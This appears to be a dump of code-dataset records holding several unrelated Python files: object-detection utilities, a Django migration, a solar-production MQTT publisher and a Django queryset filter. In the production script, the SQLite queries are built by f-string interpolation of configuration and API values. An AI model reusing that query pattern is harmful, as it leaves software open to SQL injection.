np.minimum(centroids, max_size)\n\n anchors = centroids.copy()\n\n widths = anchors[:, 0]\n sorted_indices = np.argsort(widths)\n anchor_dict[key] = anchors[sorted_indices]\n\n for key in miss_key:\n anchor_dict[key] = anchors[sorted_indices]\n with open(save_path, 'wb') as f:\n pickle.dump(anchor_dict, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef safeInt(ss):\n return int(float(ss))\n\n\ndef get_region(im):\n size_x, size_y = im.shape[0], im.shape[1]\n x_min, x_max = -1, size_x\n y_min, y_max = -1, size_y\n for i in range(2, size_x):\n if np.mean(im[i, :]) > 30:\n x_min = i\n break\n for i in range(2, size_x):\n if np.mean(im[size_x - i, :]) > 30:\n x_max = size_x - i\n break\n for i in range(2, size_y):\n if np.mean(im[:, i]) > 30:\n y_min = i\n break\n for i in range(2, size_y):\n if np.mean(im[:, size_y - i]) > 30:\n y_max = size_y - i\n break\n return x_min, x_max, y_min, y_max\n\n\nclass BBX:\n def __init__(self, x=None, y=None, w=None, h=None, score=None, name=None):\n self.name = name\n\n self.x = x\n self.y = y\n self.w = w\n self.h = h\n self.score = score\n\n def str2bbx(self, str):\n chrs = str.split(' ')\n\n self.name = chrs[0]\n\n self.x = safeInt(chrs[1])\n self.y = safeInt(chrs[2])\n self.w = safeInt(chrs[3])\n self.h = safeInt(chrs[4])\n self.score = float(chrs[5])\n\n def str2bbx_true(self, str):\n chrs = str.split(' ')\n\n self.name = chrs[0]\n\n self.x = safeInt(chrs[1])\n self.y = safeInt(chrs[2])\n self.w = safeInt(chrs[3])\n self.h = safeInt(chrs[4])\n self.score = 1\n\n def resize(self, scale, x_d, y_d):\n self.x = safeInt(self.x * scale) + x_d\n self.y = safeInt(self.y * scale) + y_d\n self.w = safeInt(self.w * scale)\n self.h = safeInt(self.h * scale)\n\n\nclass COLOR_CONF:\n def __init__(self, names=[], default_color=(255, 0, 0), default_font_size=12, line_width=1):\n self.colors = {}\n self.names = names\n if names is not None:\n self.generate_colors(names)\n\n self.default_color = default_color\n self.default_font_size = default_font_size\n self.line_width = line_width\n\n def set_color(self, name, color):\n self.colors[name] = color\n\n def generate_colors(self, names):\n for i in range(len(names)):\n self.colors[names[i]] = (random.randint(0, 125), random.randint(0, 125), random.randint(0, 125))\n\n def get_color(self, name):\n if name in self.colors:\n return self.colors[name]\n else:\n return self.default_color\n\n\nclass IMGLIB:\n def __init__(self, color_conf=None):\n if color_conf is None:\n default_color = (255, 0, 0)\n self.color_conf = COLOR_CONF(default_color=default_color)\n else:\n self.color_conf = color_conf\n\n FontData = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"OpenSans-Regular.ttf\")\n self.font = ImageFont.truetype(FontData, self.color_conf.default_font_size)\n\n def setBBXs(self, bboxs=None, names=None):\n self.bbxs = []\n for i, bbox in enumerate(bboxs):\n\n bbx = BBX()\n\n if names == None:\n bbx.name = None\n else:\n bbx.name = names[i]\n bbx.x = safeInt(bbox[0])\n bbx.y = safeInt(bbox[1])\n bbx.w = safeInt(bbox[2])\n bbx.h = safeInt(bbox[3])\n bbx.score = bbox[4]\n self.bbxs.append(bbx)\n\n def setTrueBBXs(self, bboxs=None, names=None):\n self.bbxs_true = []\n for i, bbox in enumerate(bboxs):\n\n bbx = BBX()\n\n if names is None:\n bbx.name = None\n else:\n bbx.name = names[i]\n bbx.x = safeInt(bbox[0])\n bbx.y = safeInt(bbox[1])\n bbx.w = safeInt(bbox[2])\n bbx.h = safeInt(bbox[3])\n bbx.score = 1.\n self.bbxs_true.append(bbx)\n\n def showBBXs(self):\n self.drawBox()\n self.img.show()\n\n def saveBBXs(self, fileName):\n f = 
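Annotations in this module travel as plain `name x y w h score` lines: `BBX.str2bbx` reads them with `safeInt` (int-via-float, so `"12.0"` still parses) and `saveBBXs` below writes them back with `%f` for the score. A round-trip of that line format on made-up values:

```python
# Round-trip of the 'name x y w h score' line format handled by BBX above
# (sketch; the sample values are made up).
line = 'person 12.0 40 64 128 0.87'
name, x, y, w, h, score = line.split(' ')
x, y, w, h = (int(float(v)) for v in (x, y, w, h))   # safeInt semantics
score = float(score)
print(name, x, y, w, h, score)
print('%s %d %d %d %d %f' % (name, x, y, w, h, score))  # saveBBXs output format
```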
open(fileName, 'w')\n for bbx in self.bbxs:\n f.write('%s %d %d %d %d %f\\n' % (bbx.name, bbx.x, bbx.y, bbx.w, bbx.h, bbx.score))\n f.close()\n\n def drawOneBox(self, bbx, thr=-1.0, showName=False):\n if bbx.score >= thr:\n\n x = bbx.x\n y = bbx.y\n w = bbx.w\n h = bbx.h\n # print x,y,w,h\n line1 = ((x, y), (x + w, y), (x + w, y + h), (x, y + h), (x, y))\n\n fill_color = self.color_conf.get_color(bbx.name)\n # print line1\n # print(fill_color)\n # print self.color_conf.line_width\n self.draw.line(line1, fill=fill_color, width=self.color_conf.line_width)\n\n if bbx.name == None or showName == False:\n self.draw.text((x + self.color_conf.line_width, y), str(bbx.score), fill=fill_color, font=self.font)\n else:\n self.draw.text((x + self.color_conf.line_width, y), bbx.name + ' ' + str(bbx.score), fill=fill_color,\n font=self.font)\n\n def drawOneBoxTrue(self, bbx, showName=False):\n x = bbx.x\n y = bbx.y\n w = bbx.w\n h = bbx.h\n line1 = ((x, y), (x + w, y), (x + w, y + h), (x, y + h), (x, y))\n fill_color = self.color_conf.get_color(bbx.name)\n self.draw.line(line1, fill=fill_color, width=self.color_conf.line_width)\n\n if bbx.name == None or showName == False:\n self.draw.text((x + self.color_conf.line_width, y), 'True', fill=fill_color, font=self.font)\n else:\n\n self.draw.text((x + self.color_conf.line_width, y), bbx.name + '_True', fill=fill_color, font=self.font)\n\n def drawBox(self, thr=-1.0, showName=True, show_true=True, strict=False):\n self.draw = ImageDraw.Draw(self.img)\n\n if hasattr(self, 'bbxs'):\n for bbx in self.bbxs:\n if strict and bbx.name not in self.color_conf.names:\n continue\n self.drawOneBox(bbx, thr, showName)\n\n if show_true and hasattr(self, 'bbxs_true'):\n for bbx in self.bbxs_true:\n if strict and bbx.name not in self.color_conf.names:\n continue\n self.drawOneBoxTrue(bbx, showName)\n\n def read_img(self, fileName):\n self.img = Image.open(fileName).convert('RGB')\n\n def read_gray_img(self, fileName):\n self.img = Image.open(fileName).convert('L')\n\n def read_ano(self, fileName):\n\n f = open(fileName, 'r')\n lines = f.readlines()\n self.bbxs = []\n for line in lines[:]:\n nbbx = BBX()\n nbbx.str2bbx(line)\n self.bbxs.append(nbbx)\n\n def read_ano_true(self, fileName):\n\n f = open(fileName, 'r')\n lines = f.readlines()\n self.bbxs_true = []\n for line in lines[:]:\n nbbx = BBX()\n nbbx.str2bbx_true(line)\n self.bbxs_true.append(nbbx)\n\n def resizeBBXs(self, r, x_d, y_d):\n for bbx in self.bbxs:\n bbx.resize(r, x_d, y_d)\n\n def resize(self, width, height, scale=1.0):\n o_width, o_height = self.img.size\n t_width = safeInt(width * scale)\n t_height = safeInt(height * scale)\n\n o_ratio = o_width / float(o_height)\n n_ratio = width / float(height)\n\n if o_ratio > n_ratio:\n re_ration = t_width / float(o_width)\n a_height = safeInt(re_ration * o_height)\n a_width = t_width\n self.img = self.img.resize((a_width, a_height), Image.ANTIALIAS)\n else:\n re_ration = t_height / float(o_height)\n a_width = safeInt(re_ration * o_width)\n a_height = t_height\n self.img = self.img.resize((a_width, a_height), Image.ANTIALIAS)\n\n self.x_d = random.randint(0, abs(a_width - width))\n self.y_d = random.randint(0, abs(a_height - height))\n imgNew = Image.new(\"RGB\", (width, height), \"black\")\n\n box = (0, 0, a_width, a_height)\n region = self.img.crop(box)\n\n imgNew.paste(region, (self.x_d, self.y_d))\n self.img = imgNew\n if hasattr(self, 'bbxs'):\n self.resizeBBXs(re_ration, self.x_d, self.y_d)\n # self.drawBox()\n\n def cleanAno(self, w0, h0):\n newBBXS = []\n for 
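`drawOneBox` above renders each detection as a closed five-point polyline plus a text label offset by the line width; the essentials fit in a few lines of plain Pillow. A synthetic example (image size, box, and label are made up, and the default PIL font stands in for the bundled OpenSans):

```python
# Labeled detection box in the style of drawOneBox above (sketch; the image,
# box, and label are synthetic and the default PIL font is used).
from PIL import Image, ImageDraw

img = Image.new('RGB', (200, 150), 'black')
draw = ImageDraw.Draw(img)

x, y, w, h, name, score = 40, 30, 90, 70, 'person', 0.87
outline = ((x, y), (x + w, y), (x + w, y + h), (x, y + h), (x, y))  # closed box
draw.line(outline, fill=(255, 0, 0), width=2)
draw.text((x + 2, y), '%s %.2f' % (name, score), fill=(255, 0, 0))
img.save('labeled_box_demo.png')
```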
bbox in self.bbxs:\n if bbox.x >= 0 and bbox.x <= w0 and bbox.y >= 0 and bbox.y <= h0 and bbox.w >= 20 and bbox.w <= w0 and bbox.h >= 30 and bbox.h <= h0:\n bbx = BBX()\n bbx.name = bbox.name\n bbx.x = bbox.x\n bbx.y = bbox.y\n bbx.w = bbox.w\n bbx.h = bbox.h\n bbx.score = bbox.score\n newBBXS.append(bbx)\n self.bbxs = newBBXS\n\n def save_img(self, imgName):\n self.img.save(imgName)\n\n def pureResize(self, width, height):\n re_ration = float(width) / self.img.size[0]\n self.img = self.img.resize((width, height), Image.ANTIALIAS)\n if hasattr(self, 'bbxs'):\n self.resizeBBXs(re_ration, 0, 0)\n\n def pureResizeBBX(self, original_width, width, height):\n re_ration = float(width) / original_width\n if hasattr(self, 'bbxs'):\n self.resizeBBXs(re_ration, 0, 0)\n\n def flip(self, width):\n self.img = self.img.transpose(Image.FLIP_LEFT_RIGHT)\n newBBXS = []\n for bbox in self.bbxs:\n bbox.x = width - bbox.x - bbox.w\n newBBXS.append(bbox)\n self.bbxs = newBBXS\n\n def normalization(self, mean_pix): # 除以均值\n im = np.asarray(self.img, dtype=np.float)\n x_min, x_max, y_min, y_max = get_region(im)\n tmp = im[im > 20]\n if len(tmp) == 0:\n return\n im *= mean_pix / np.mean(tmp)\n # delta = np.mean(im[x_min:x_max, y_min:y_max]) - mean_pix\n # im[x_min:x_max, y_min:y_max] -= delta\n im[im < 0] = 0\n im[im > 255] = 255\n self.img = Image.fromarray(np.uint8(im))\n\n # def normalization(self, mean_pix, var_pix): #减均值\n # im = np.asarray(self.img, dtype=np.float)\n # x_min, x_max, y_min, y_max = get_region(im)\n # tmp = im[im > 20]\n # if len(tmp) == 0:\n # return\n # im = im - np.mean(tmp) + mean_pix\n # im[im < 0] = 0\n # im[im > 255] = 255\n # self.img = Image.fromarray(np.uint8(im))\n\n # def normalization(self, mean_pix, var_pix): #减均值,除方差\n # im = np.asarray(self.img, dtype=np.float)\n # x_min, x_max, y_min, y_max = get_region(im)\n # tmp = im[im > 20]\n # if len(tmp) == 0:\n # return\n # im = im - np.mean(tmp) + mean_pix\n # im = im * var_pix / np.var(tmp)\n # im[im < 0] = 0\n # im[im > 255] = 255\n # self.img = Image.fromarray(np.uint8(im))\n\n\n# mat1 --> ground truth(s); mat2 --> anchors\ndef compute_overlap(mat1, mat2):\n s1 = mat1.shape[0]\n s2 = mat2.shape[0]\n area1 = (mat1[:, 2] - mat1[:, 0]) * (mat1[:, 3] - mat1[:, 1])\n if mat2.shape[1] == 5:\n area2 = mat2[:, 4]\n else:\n area2 = (mat2[:, 2] - mat2[:, 0]) * (mat2[:, 3] - mat2[:, 1])\n x1 = cartesian([mat1[:, 0], mat2[:, 0]])\n x1 = np.amax(x1, axis=1)\n x2 = cartesian([mat1[:, 2], mat2[:, 2]])\n x2 = np.amin(x2, axis=1)\n com_zero = np.zeros(x2.shape[0])\n w = x2 - x1\n w = w - 1\n w = np.maximum(com_zero, w)\n y1 = cartesian([mat1[:, 1], mat2[:, 1]])\n y1 = np.amax(y1, axis=1)\n y2 = cartesian([mat1[:, 3], mat2[:, 3]])\n y2 = np.amin(y2, axis=1)\n h = y2 - y1\n h = h - 1\n h = np.maximum(com_zero, h)\n oo = w * h\n aa = cartesian([area1[:], area2[:]])\n aa = np.sum(aa, axis=1)\n ooo = oo / (aa - oo)\n overlap = np.transpose(ooo.reshape(s1, s2), (1, 0))\n return overlap\n\n\n# mat1 --> ground truth; mat2 --> anchor\ndef compute_regression(mat1, mat2):\n target = np.zeros(4)\n w1 = mat1[2] - mat1[0]\n h1 = mat1[3] - mat1[1]\n w2 = mat2[2] - mat2[0]\n h2 = mat2[3] - mat2[1]\n target[0] = (mat1[0] - mat2[0]) / w2\n target[1] = (mat1[1] - mat2[1]) / h2\n target[2] = np.log(w1 / w2)\n target[3] = np.log(h1 / h2)\n return target\n\n\ndef compute_target(roi_t, proposals, fg_thresh, bg_thresh):\n roi = roi_t.copy()\n roi[:, 2] += roi[:, 0]\n roi[:, 3] += roi[:, 1]\n proposal_size = proposals.shape[0]\n roi_anchor = np.zeros([proposal_size, 5])\n 
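# roi_anchor layout (annotation of the code below): column 0 is the foreground/background label;\n    # columns 1-4 hold the regression target from compute_regression above, i.e. for ground truth g\n    # and anchor a in corner format: t_x = (g_x1 - a_x1) / a_w, t_y = (g_y1 - a_y1) / a_h,\n    # t_w = log(g_w / a_w), t_h = log(g_h / a_h)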
# roi_anchor[:, 0] = 0 #change here to set all bbx to background\n if roi.shape[0] == 0:\n # roi_anchor[:, 0] = 0\n return roi_anchor, 0\n overlap = compute_overlap(roi, proposals)\n overlap_max = np.max(overlap, axis=1)\n overlap_max_idx = np.argmax(overlap, axis=1)\n for i in range(proposal_size):\n if overlap_max[i] >= fg_thresh:\n roi_anchor[i, 0] = 1\n roi_anchor[i, 1:5] = compute_regression(roi[overlap_max_idx[i], :4], proposals[i, :])\n if overlap_max[i] <= bg_thresh:\n roi_anchor[i, 0] = 0\n foreground = np.sum(roi_anchor[:, 0] > 1)\n return roi_anchor, foreground\n\n\ndef compute_target_v2(roi_t, proposals, fg_thresh):\n roi = roi_t.copy()\n roi[:, 2] += roi[:, 0]\n roi[:, 3] += roi[:, 1]\n proposal_size = proposals.shape[0]\n roi_anchor = np.zeros([proposal_size, 5])\n # roi_anchor[:, 0] = 0 #change here to set all bbx to background\n if roi.shape[0] == 0:\n # roi_anchor[:, 0] = 0\n return roi_anchor, 0\n overlap = compute_overlap(roi, proposals)\n overlap_max = np.max(overlap, axis=1)\n overlap_max_idx = np.argmax(overlap, axis=1)\n for i in range(proposal_size):\n if overlap_max[i] >= fg_thresh:\n roi_anchor[i, 0] = 1\n roi_anchor[i, 1:5] = compute_regression(roi[overlap_max_idx[i], :4], proposals[i, :])\n # else:\n # roi_anchor[i, 0] = 0\n foreground = np.sum(roi_anchor[:, 0] > 1)\n return roi_anchor, foreground\n","sub_path":"TARTDetection/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":17107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"225529389","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('profiles', '0012_auto_20150905_1915'),\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ResearcherInvitation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('message', models.TextField(max_length=1000, blank=True)),\n ('key', models.CharField(max_length=8)),\n ('activated', models.BooleanField(default=False)),\n ('invitee', models.ForeignKey(to='profiles.Researcher')),\n ('inviter', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"invite/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"231776544","text":"import requests\r\nimport json\r\nfrom datetime import datetime, timedelta\r\nfrom dateutil.relativedelta import *\r\n\r\nfrom importlib import import_module\r\nmain = import_module(\"main\")\r\nf = import_module(\"function\")\r\n\r\ndef dailyProduction(cur, client, last_activation_date):\r\n my_date = datetime.now()\r\n pdl = main.pdl\r\n production_base = main.production_base\r\n\r\n ha_discovery = {\r\n pdl: {}\r\n }\r\n\r\n # Check activation data\r\n last_activation_date = last_activation_date.split(\"+\")[0]\r\n last_activation_date = datetime.strptime(last_activation_date, '%Y-%m-%d')\r\n\r\n lastYears = datetime.now() + relativedelta(years=-1)\r\n dateBegin = lastYears.strftime('%Y-%m-%d')\r\n dateEnded = my_date.strftime('%Y-%m-%d')\r\n\r\n data = dailyProductionBeetwen(cur, pdl, dateBegin, dateEnded, last_activation_date)\r\n for key, value in data.items():\r\n 
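# data maps period keys (dateBegin/dateEnded, j-1..j-7, thisWeek, thisMonth, thisYear) to energy readings; publish each one to MQTT and mirror it into the HA discovery attributes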
f.publish(client, f\"{pdl}/production/current_year/{key}\", str(value))\r\n if key != \"dateBegin\" and key != \"dateEnded\":\r\n ha_discovery[pdl].update({\r\n f\"production_{key.replace('-','_')}\": {\r\n \"value\": str(value),\r\n \"unit_of_meas\": \"W\",\r\n \"device_class\": \"energy\",\r\n \"state_class\": \"total_increasing\",\r\n \"attributes\": {}\r\n }\r\n })\r\n if production_base != 0:\r\n if isinstance(value, int):\r\n roundValue = round(int(value) / 1000 * production_base, 2)\r\n f.publish(client, f\"{pdl}/production_price/current_year/{key}\", roundValue)\r\n if key != \"dateBegin\" and key != \"dateEnded\":\r\n if not f\"price\" in ha_discovery[pdl][f\"production_{key.replace('-', '_')}\"]['attributes'].keys():\r\n ha_discovery[pdl][f\"production_{key.replace('-', '_')}\"]['attributes'][f\"price\"] = str(roundValue)\r\n lastData = data\r\n\r\n current_year = 1\r\n while current_year <= main.years:\r\n if main.years >= current_year:\r\n f.log(f\"Year => {current_year}\")\r\n dateEnded = dateBegin\r\n dateEndedDelta = datetime.strptime(dateEnded, '%Y-%m-%d')\r\n # dateEnded = dateEndedDelta + relativedelta(days=-1)\r\n # dateEnded = dateEnded.strftime('%Y-%m-%d')\r\n dateBegin = dateEndedDelta + relativedelta(years=-1)\r\n dateBegin = dateBegin.strftime('%Y-%m-%d')\r\n data = dailyProductionBeetwen(cur, pdl, dateBegin, dateEnded, last_activation_date)\r\n if \"error_code\" in data:\r\n f.publish(client, f\"{pdl}/production/year-{current_year}/error\", str(1))\r\n for key, value in data.items():\r\n f.publish(client, f\"{pdl}/production/year-{current_year}/errorMsg/{key}\", str(value))\r\n else:\r\n f.publish(client, f\"{pdl}/production/year-{current_year}/error\", str(0))\r\n for key, value in data.items():\r\n f.publish(client, f\"{pdl}/production/year-{current_year}/{key}\", str(value))\r\n if key != \"dateBegin\" and key != \"dateEnded\":\r\n if f\"production_{key.replace('-', '_')}\" in ha_discovery[pdl]:\r\n # CALC VARIATION\r\n if key in lastData:\r\n variation = (lastData[key] - value) / value * 100\r\n if not f\"variation_year_{current_year}\" in ha_discovery[pdl][f\"production_{key.replace('-', '_')}\"]['attributes'].keys():\r\n ha_discovery[pdl][f\"production_{key.replace('-', '_')}\"]['attributes'][f\"variation_year_{current_year}\"] = str(round(variation, 2))\r\n # SET HISTORY ATTRIBUTES\r\n if not f\"history_year_{current_year}\" in ha_discovery[pdl][f\"production_{key.replace('-', '_')}\"]['attributes'].keys():\r\n ha_discovery[pdl][f\"production_{key.replace('-', '_')}\"]['attributes'][f\"history_year_{current_year}\"] = str(value)\r\n if production_base != 0:\r\n if isinstance(value, int):\r\n roundValue = round(int(value) / 1000 * production_base, 2)\r\n f.publish(client, f\"{pdl}/production_price/year-{current_year}/{key}\", roundValue)\r\n # if f\"price_production_{key.replace('-', '_')}\" in ha_discovery[pdl]:\r\n if not f\"price_year_{current_year}\" in ha_discovery[pdl][f\"production_{key.replace('-', '_')}\"]['attributes'].keys():\r\n ha_discovery[pdl][f\"production_{key.replace('-', '_')}\"]['attributes'][f\"price_year_{current_year}\"] = str(roundValue)\r\n current_year = current_year + 1\r\n return ha_discovery\r\n\r\ndef checkHistoryProductionDaily(cur, dateBegin, dateEnded):\r\n pdl = main.pdl\r\n dateBegin = datetime.strptime(dateBegin, '%Y-%m-%d')\r\n dateEnded = datetime.strptime(dateEnded, '%Y-%m-%d')\r\n delta = dateEnded - dateBegin\r\n result = {\r\n \"status\": True,\r\n \"date\": [],\r\n \"count\": 0\r\n }\r\n for i in range(delta.days + 
1):\r\n checkDate = dateBegin + timedelta(days=i)\r\n checkDate = checkDate.strftime('%Y-%m-%d')\r\n query = f\"SELECT * FROM production_daily WHERE pdl = '{main.pdl}' AND date = '{checkDate}'\"\r\n cur.execute(query)\r\n if cur.fetchone() is None:\r\n main.api_no_result.append(checkDate)\r\n result[\"date\"].append(checkDate)\r\n result[\"status\"] = False\r\n result[\"count\"] = result[\"count\"] + 1\r\n return result\r\n\r\ndef dailyProductionBeetwen(cur, pdl, dateBegin, dateEnded, last_activation_date):\r\n response = {}\r\n\r\n lastYears = datetime.strptime(dateEnded, '%Y-%m-%d')\r\n lastYears = lastYears + relativedelta(years=-1)\r\n if lastYears < last_activation_date:\r\n dateBegin = last_activation_date\r\n dateBegin = dateBegin.strftime('%Y-%m-%d')\r\n\r\n response['dateBegin'] = dateBegin\r\n response['dateEnded'] = dateEnded\r\n\r\n data = {\r\n \"type\": \"daily_production\",\r\n \"usage_point_id\": str(pdl),\r\n \"start\": str(dateBegin),\r\n \"end\": str(dateEnded),\r\n }\r\n\r\n try:\r\n new_date = []\r\n current_data = checkHistoryProductionDaily(cur, dateBegin, dateEnded)\r\n if current_data['status'] == True:\r\n f.log(f\"All data loading beetween {dateBegin} / {dateEnded}\")\r\n f.log(f\" => Skip API Call\")\r\n else:\r\n f.log(f\"Data is missing between {dateBegin} / {dateEnded}\")\r\n\r\n daily_production = requests.request(\"POST\", url=f\"{main.url}\", headers=main.headers, data=json.dumps(data)).json()\r\n meter_reading = daily_production['meter_reading']\r\n mesures = {}\r\n f.log(\"Import data :\")\r\n log_import = []\r\n for interval_reading in meter_reading[\"interval_reading\"]:\r\n date = interval_reading['date']\r\n value = interval_reading['value']\r\n cur.execute(f\"INSERT OR REPLACE INTO production_daily VALUES ('{pdl}','{interval_reading['date']}','{interval_reading['value']}')\")\r\n new_date.append(interval_reading['date'])\r\n mesures[date] = value\r\n list_date = list(reversed(sorted(mesures.keys())))\r\n\r\n f.splitLog(new_date)\r\n\r\n not_found_data = []\r\n for current_date in current_data['date']:\r\n if not current_date in new_date:\r\n not_found_data.append(current_date)\r\n\r\n if not_found_data != []:\r\n f.log(\"Data not found :\")\r\n f.splitLog(not_found_data)\r\n\r\n dateEnded = datetime.strptime(dateEnded, '%Y-%m-%d')\r\n\r\n dateWeek = dateEnded + relativedelta(days=-7)\r\n dateMonths = dateEnded + relativedelta(months=-1)\r\n dateYears = dateEnded + relativedelta(years=-1)\r\n j1 = dateEnded + relativedelta(days=-1)\r\n j1 = j1.replace(hour=0, minute=0, second=0, microsecond=0)\r\n j2 = dateEnded + relativedelta(days=-2)\r\n j2 = j2.replace(hour=0, minute=0, second=0, microsecond=0)\r\n j3 = dateEnded + relativedelta(days=-3)\r\n j3 = j3.replace(hour=0, minute=0, second=0, microsecond=0)\r\n j4 = dateEnded + relativedelta(days=-4)\r\n j4 = j4.replace(hour=0, minute=0, second=0, microsecond=0)\r\n j5 = dateEnded + relativedelta(days=-5)\r\n j5 = j5.replace(hour=0, minute=0, second=0, microsecond=0)\r\n j6 = dateEnded + relativedelta(days=-6)\r\n j6 = j6.replace(hour=0, minute=0, second=0, microsecond=0)\r\n j7 = dateEnded + relativedelta(days=-7)\r\n j7 = j7.replace(hour=0, minute=0, second=0)\r\n\r\n energyWeek = 0\r\n energyMonths = 0\r\n energyYears = 0\r\n\r\n for date in list_date:\r\n value = int(mesures[date])\r\n current_date = datetime.strptime(date, '%Y-%m-%d')\r\n\r\n # WEEK DAYS\r\n if current_date == j1:\r\n response['j-1'] = value\r\n if current_date == j2:\r\n response['j-2'] = value\r\n if current_date == j3:\r\n 
response['j-3'] = value\r\n if current_date == j4:\r\n response['j-4'] = value\r\n if current_date == j5:\r\n response['j-5'] = value\r\n if current_date == j6:\r\n response['j-6'] = value\r\n if current_date == j7:\r\n response['j-7'] = value\r\n # LAST WEEK\r\n if current_date >= dateWeek:\r\n energyWeek = int(energyWeek) + int(value)\r\n # LAST MONTH\r\n if current_date >= dateMonths:\r\n energyMonths = int(energyMonths) + int(value)\r\n # LAST YEARS\r\n if current_date >= dateYears:\r\n energyYears = int(energyYears) + int(value)\r\n\r\n response['thisWeek'] = energyWeek\r\n response['thisMonth'] = energyMonths\r\n response['thisYear'] = energyYears\r\n except:\r\n for error_key, error_msg in daily_production.items():\r\n response[error_key] = error_msg\r\n\r\n return response","sub_path":"app/daily_production.py","file_name":"daily_production.py","file_ext":"py","file_size_in_byte":10456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"170461253","text":"# -*- coding: utf-8 -*-\n\"\"\"This module contains the generic filter for all project\n\"\"\"\n\n__author__ = \"Yoanny Torres Rubio\"\n__copyright__ = \"Copyright 2013-2014, GRHS\"\n__version__ = \"0.1\"\n__email__ = \"tlm@uci.cu\"\n\nfrom django.db.models.fields import DateTimeField\nfrom configuration.server.location.models import AgentInfo, Location\nfrom core.agent.models import Agent\nfrom core.collector.models import InformationAgent\nfrom inventory.stocktaking.models import Inventory\nfrom maai.actions.models import ActionClient\nfrom maai.alerts.models import MessageAlert\nfrom maai.controls.models import ControlClient\nfrom maai.incidence.models import Incidence\nimport datetime\nimport time\n\n\ndef generic_filter(queryset, self, model_class=None):\n model_class = model_class or queryset.model\n for field in model_class._meta.local_fields:\n param = self.request.QUERY_PARAMS.get(field.name, None)\n\n di = {}\n if param is not None:\n if type(field) is DateTimeField:\n try:\n time.strptime(param, '%Y-%m-%d')\n date_time = datetime.datetime.strptime(\n param,\n '%Y-%m-%d'\n ).date()\n di[field.name + '__year'] = date_time.year\n di[field.name + '__month'] = date_time.month\n di[field.name + '__day'] = date_time.day\n except:\n asd = 5\n #raise Exception.\n\n if field.name not in ('component', 'type', 'state', 'level',\n 'plataform', 'menu', 'permission'):\n if str(param) == 'True':\n di[field.name] = True\n elif str(param) == 'False':\n di[field.name] = False\n elif type(field) is not DateTimeField:\n di[field.name + \"__contains\"] = str(param)\n elif model_class is MessageAlert:\n if type(field) is not DateTimeField:\n di[field.name + \"__contains\"] = str(param)\n else:\n if type(field) is not DateTimeField:\n di[field.name + \"__name__contains\"] = str(param)\n\n queryset = queryset.filter(**di)\n\n queryset = get_by_host(self, queryset, '__contains', model_class, 'host')\n\n queryset = get_by_host(self, queryset, '', model_class, 'mb_strict')\n\n location = self.request.QUERY_PARAMS.get('location', None)\n\n if location is not None:\n location_lookup = 'inventory__agent__host__in'\n if model_class in (InformationAgent, Incidence, ActionClient,\n ControlClient, Inventory):\n location_lookup = ('agent__info__network__locations__place__name__'\n 'contains')\n elif model_class is Agent:\n location_lookup = 'info__network__locations__place__name__contains'\n else:\n location_lookup = ('inventory__agent__info__network__locations__'\n 'place__name__contains')\n\n queryset 
= queryset.filter(**{location_lookup: location})\n\n sort = self.request.QUERY_PARAMS.get('sort', None)\n\n order = self.request.QUERY_PARAMS.get('order', None)\n\n if sort is not None:\n sort = str(sort)\n if order is not None:\n if order == 'desc':\n value_field = '-' + sort\n queryset = queryset.order_by(value_field)\n else:\n queryset = queryset.order_by(sort)\n else:\n queryset = queryset.order_by()\n\n return queryset\n\n\ndef get_by_host(self, queryset, query, model_class, param):\n host = self.request.QUERY_PARAMS.get(param, None)\n\n if host is not None:\n fill = {}\n if model_class in (InformationAgent, Incidence, ActionClient,\n ControlClient, Inventory):\n fill['agent__host' + query] = host\n elif model_class is Agent:\n fill['host' + query] = host\n else:\n fill['inventory__agent__host' + query] = host\n fill['status'] = True\n\n queryset = queryset.filter(**fill)\n\n return queryset\n","sub_path":"xilema/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":4204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"106018640","text":"from ..tyrell.dsl import Node, HoleNode\nfrom ..tyrell.spec import FunctionProduction\n\nclass InvariantHeuristic():\n '''\n Provides a set of invariant heuristic checkings.\n Returns True if the given heuristic is good to go, False if not.\n '''\n\n def __init__():\n pass\n\n # @classmethod\n # def no_duplicate_children(self, arg_prods, arg_inv):\n # '''\n # Check if *all* children of nodes of designated production rules are exactly the same.\n # '''\n # assert len(arg_prods)>0, \"Should provide at least one production rule for checking.\"\n # if isinstance(arg_inv, HoleNode):\n # # if root node is a hole, just return False\n # return True\n # elif arg_inv.production in arg_prods:\n # sig_list = [str(p) for p in arg_inv.children]\n # sig_set = set(sig_list)\n # return len(sig_set) > 1\n # else:\n # # move on to next level\n # res_list = [InvariantHeuristic.no_duplicate_children(p) for p in arg_inv.children]\n # return all(res_list)\n\n @classmethod\n def no_duplicate_children(self, arg_inv):\n '''\n Check if *all* children of nodes look the same.\n Apply to complete invariant.\n '''\n if isinstance(arg_inv, HoleNode):\n # if root node is a hole, just return False\n return True\n elif len(arg_inv.children) > 1:\n sig_list = [str(p) for p in arg_inv.children]\n sig_set = set(sig_list)\n return len(sig_set) > 1\n else:\n # move on to next level\n res_list = [InvariantHeuristic.no_duplicate_children(p) for p in arg_inv.children]\n return all(res_list)\n\n @classmethod\n def no_enum2expr_root(self, arg_inv):\n '''\n Check if the root node is enum2expr.\n Apply to complete and partial invariants.\n '''\n if isinstance(arg_inv, HoleNode):\n return True\n elif isinstance(arg_inv.production, FunctionProduction):\n if arg_inv.production.name == \"enum2expr\":\n return False\n else:\n return True\n else:\n return 